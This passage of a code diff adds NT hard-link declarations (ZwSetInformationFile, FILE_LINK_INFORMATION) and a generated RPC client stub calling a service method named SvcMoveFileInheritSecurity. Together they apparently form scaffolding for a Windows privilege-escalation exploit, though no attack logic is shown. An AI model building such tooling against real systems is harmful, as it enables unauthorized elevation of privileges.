+	_In_  ULONG              OpenOptions
+	);
+
+const ULONG FileLinkInformation = 11;
+
+typedef struct _FILE_LINK_INFORMATION {
+	BOOLEAN ReplaceIfExists;
+	HANDLE  RootDirectory;
+	ULONG   FileNameLength;
+	WCHAR   FileName[1];
+} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
+
+typedef NTSTATUS(__stdcall *_ZwSetInformationFile)(
+	_In_   HANDLE                 FileHandle,
+	_Out_  PIO_STATUS_BLOCK       IoStatusBlock,
+	_In_   PVOID                  FileInformation,
+	_In_   ULONG                  Length,
+	_In_   ULONG			      FileInformationClass
+	);
+typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status);
+void SetNtLastError(NTSTATUS status);
+
+#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x)
@@ -0,0 +1,1797 @@
+
+
+/* this ALWAYS GENERATED file contains the RPC client stubs */
+
+
+ /* File created by MIDL compiler version 8.00.0603 */
+/* at Tue Jul 02 08:26:16 2019
+ */
+/* Compiler settings for rpc.idl:
+    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 
+    protocol : dce , ms_ext, c_ext, robust
+    error checks: allocation ref bounds_check enum stub_data 
+    VC __declspec() decoration level: 
+         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
+         DECLSPEC_UUID(), MIDL_INTERFACE()
+*/
+/* @@MIDL_FILE_HEADING(  ) */
+
+#if defined(_M_AMD64)
+
+
+#pragma warning( disable: 4049 )  /* more than 64k source lines */
+#if _MSC_VER >= 1200
+#pragma warning(push)
+#endif
+
+#pragma warning( disable: 4211 )  /* redefine extern to static */
+#pragma warning( disable: 4232 )  /* dllimport identity*/
+#pragma warning( disable: 4024 )  /* array to pointer mapping*/
+
+#include <string.h>
+
+#include "rpc_h.h"
+
+#define TYPE_FORMAT_STRING_SIZE   141                               
+#define PROC_FORMAT_STRING_SIZE   1123                              
+#define EXPR_FORMAT_STRING_SIZE   1                                 
+#define TRANSMIT_AS_TABLE_SIZE    0            
+#define WIRE_MARSHAL_TABLE_SIZE   0            
+
+typedef struct _rpc_MIDL_TYPE_FORMAT_STRING
+    {
+    short          Pad;
+    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_TYPE_FORMAT_STRING;
+
+typedef struct _rpc_MIDL_PROC_FORMAT_STRING
+    {
+    short          Pad;
+    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_PROC_FORMAT_STRING;
+
+typedef struct _rpc_MIDL_EXPR_FORMAT_STRING
+    {
+    long          Pad;
+    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
+    } rpc_MIDL_EXPR_FORMAT_STRING;
+
+
+static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
+{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
+
+
+extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString;
+extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString;
+extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString;
+
+#define GENERIC_BINDING_TABLE_SIZE   0            
+
+
+/* Standard interface: DefaultIfName, ver. 0.0,
+   GUID={0xbe7f785e,0x0e3a,0x4ab7,{0x91,0xde,0x7e,0x46,0xe4,0x43,0xbe,0x29}} */
+
+
+
+static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface =
+    {
+    sizeof(RPC_CLIENT_INTERFACE),
+    {{0xbe7f785e,0x0e3a,0x4ab7,{0x91,0xde,0x7e,0x46,0xe4,0x43,0xbe,0x29}},{0,0}},
+    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
+    0,
+    0,
+    0,
+    0,
+    0,
+    0x00000000
+    };
+RPC_IF_HANDLE DefaultIfName_v0_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface;
+
+extern const MIDL_STUB_DESC DefaultIfName_StubDesc;
+
+static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle;
+
+
+long Proc0( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[0],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc1( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[54],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc2( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[108],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc3( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [out] */ long *arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[162],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc4( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ struct Struct_34_t *arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[210],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc5( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ short arg_2,
+    /* [in] */ long arg_3,
+    /* [out] */ struct Struct_76_t *arg_4)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[264],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc6( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ long arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[324],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc7( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ long arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[378],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc8( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ long arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[426],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc9( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[474],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc10( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ short arg_3,
+    /* [out] */ long *arg_4)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[522],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc11( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [in] */ short arg_3,
+    /* [in] */ long arg_4)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[582],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3,
+                  arg_4);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc12( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ struct Struct_90_t *arg_1)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[642],
+                  IDL_handle,
+                  arg_1);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc13( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[684],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+__int3264 SvcMoveFileInheritSecurity( 
+    /* [in] */ handle_t IDL_handle,
+    /* [string][in] */ wchar_t *src,
+    /* [string][in] */ wchar_t *dest,
+    /* [in] */ long flags)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[732],
+                  IDL_handle,
+                  src,
+                  dest,
+                  flags);
+    return ( __int3264  )_RetVal.Simple;
+    
+}
+
+
+long Proc15( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2,
+    /* [out][in] */ struct Struct_112_t *arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[786],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc16( 
+    /* [in] */ handle_t IDL_handle)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[840],
+                  IDL_handle);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc17( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [in] */ long arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[876],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc18( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [out] */ long *arg_2)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[924],
+                  IDL_handle,
+                  arg_1,
+                  arg_2);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc19( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [string][unique][in] */ wchar_t *arg_2,
+    /* [out] */ long *arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[972],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc20( 
+    /* [in] */ handle_t IDL_handle,
+    /* [in] */ short arg_1,
+    /* [string][unique][in] */ wchar_t *arg_2,
+    /* [in] */ long arg_3)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1026],
+                  IDL_handle,
+                  arg_1,
+                  arg_2,
+                  arg_3);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+long Proc21( 
+    /* [in] */ handle_t IDL_handle,
+    /* [out][in] */ struct Struct_134_t *arg_1)
+{
+
+    CLIENT_CALL_RETURN _RetVal;
+
+    _RetVal = NdrClientCall2(
+                  ( PMIDL_STUB_DESC  )&DefaultIfName_StubDesc,
+                  (PFORMAT_STRING) &rpc__MIDL_ProcFormatString.Format[1080],
+                  IDL_handle,
+                  arg_1);
+    return ( long  )_RetVal.Simple;
+    
+}
+
+
+#if !defined(__RPC_WIN64__)
+#error  Invalid build platform for this stub.
+#endif
+
+static const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString =
+    {
+        0,
+        {
+
+	/* Procedure Proc0 */
+
+			0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/*  2 */	NdrFcLong( 0x0 ),	/* 0 */
+/*  6 */	NdrFcShort( 0x0 ),	/* 0 */
+/*  8 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 10 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 12 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 14 */	NdrFcShort( 0x16 ),	/* 22 */
+/* 16 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 18 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x4,		/* 4 */
+/* 20 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 22 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 24 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 26 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 28 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 30 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 32 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 34 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 36 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 38 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 40 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 42 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 44 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 46 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 48 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 50 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 52 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc1 */
+
+
+	/* Return value */
+
+/* 54 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 56 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 60 */	NdrFcShort( 0x1 ),	/* 1 */
+/* 62 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 64 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 66 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 68 */	NdrFcShort( 0x16 ),	/* 22 */
+/* 70 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 72 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x4,		/* 4 */
+/* 74 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 76 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 78 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 80 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 82 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 84 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 86 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 88 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 90 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 92 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 94 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 96 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 98 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 100 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 102 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 104 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 106 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc2 */
+
+
+	/* Return value */
+
+/* 108 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 110 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 114 */	NdrFcShort( 0x2 ),	/* 2 */
+/* 116 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 118 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 120 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 122 */	NdrFcShort( 0x16 ),	/* 22 */
+/* 124 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 126 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x4,		/* 4 */
+/* 128 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 130 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 132 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 134 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 136 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 138 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 140 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 142 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 144 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 146 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 148 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 150 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 152 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 154 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 156 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 158 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 160 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc3 */
+
+
+	/* Return value */
+
+/* 162 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 164 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 168 */	NdrFcShort( 0x3 ),	/* 3 */
+/* 170 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 172 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 174 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 176 */	NdrFcShort( 0x6 ),	/* 6 */
+/* 178 */	NdrFcShort( 0x24 ),	/* 36 */
+/* 180 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x3,		/* 3 */
+/* 182 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 184 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 186 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 188 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 190 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 192 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 194 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 196 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 198 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
+/* 200 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 202 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 204 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 206 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 208 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc4 */
+
+
+	/* Return value */
+
+/* 210 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 212 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 216 */	NdrFcShort( 0x4 ),	/* 4 */
+/* 218 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 220 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 222 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 224 */	NdrFcShort( 0x4ba ),	/* 1210 */
+/* 226 */	NdrFcShort( 0x4b4 ),	/* 1204 */
+/* 228 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x4,		/* 4 */
+/* 230 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 232 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 234 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 236 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 238 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 240 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 242 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 244 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 246 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 248 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 250 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 252 */	NdrFcShort( 0x11a ),	/* Flags:  must free, in, out, simple ref, */
+/* 254 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 256 */	NdrFcShort( 0x22 ),	/* Type Offset=34 */
+
+	/* Parameter arg_3 */
+
+/* 258 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 260 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 262 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc5 */
+
+
+	/* Return value */
+
+/* 264 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 266 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 270 */	NdrFcShort( 0x5 ),	/* 5 */
+/* 272 */	NdrFcShort( 0x30 ),	/* X64 Stack size/offset = 48 */
+/* 274 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 276 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 278 */	NdrFcShort( 0x14 ),	/* 20 */
+/* 280 */	NdrFcShort( 0x44 ),	/* 68 */
+/* 282 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x5,		/* 5 */
+/* 284 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 286 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 288 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 290 */	NdrFcShort( 0x0 ),	/* 0 */
+/* 292 */	NdrFcShort( 0x0 ),	/* 0 */
+
+	/* Parameter IDL_handle */
+
+/* 294 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 296 */	NdrFcShort( 0x8 ),	/* X64 Stack size/offset = 8 */
+/* 298 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_1 */
+
+/* 300 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 302 */	NdrFcShort( 0x10 ),	/* X64 Stack size/offset = 16 */
+/* 304 */	0x6,		/* FC_SHORT */
+			0x0,		/* 0 */
+
+	/* Parameter arg_2 */
+
+/* 306 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
+/* 308 */	NdrFcShort( 0x18 ),	/* X64 Stack size/offset = 24 */
+/* 310 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Parameter arg_3 */
+
+/* 312 */	NdrFcShort( 0x2112 ),	/* Flags:  must free, out, simple ref, srv alloc size=8 */
+/* 314 */	NdrFcShort( 0x20 ),	/* X64 Stack size/offset = 32 */
+/* 316 */	NdrFcShort( 0x48 ),	/* Type Offset=72 */
+
+	/* Parameter arg_4 */
+
+/* 318 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
+/* 320 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 322 */	0x8,		/* FC_LONG */
+			0x0,		/* 0 */
+
+	/* Procedure Proc6 */
+
+
+	/* Return value */
+
+/* 324 */	0x0,		/* 0 */
+			0x48,		/* Old Flags:  */
+/* 326 */	NdrFcLong( 0x0 ),	/* 0 */
+/* 330 */	NdrFcShort( 0x6 ),	/* 6 */
+/* 332 */	NdrFcShort( 0x28 ),	/* X64 Stack size/offset = 40 */
+/* 334 */	0x32,		/* FC_BIND_PRIMITIVE */
+			0x0,		/* 0 */
+/* 336 */	NdrFcShort( 0x0 ),	/* X64 Stack size/offset = 0 */
+/* 338 */	NdrFcShort( 0x18 ),	/* 24 */
+/* 340 */	NdrFcShort( 0x8 ),	/* 8 */
+/* 342 */	0x44,		/* Oi2 Flags:  has return, has ext, */
+			0x4,		/* 4 */
+/* 344 */	0xa,		/* 10 */
+			0x1,		/* Ext Flags:  new corr desc, */
+/* 346 */	NdrFcShort( 0x0 ),	/* 0 */
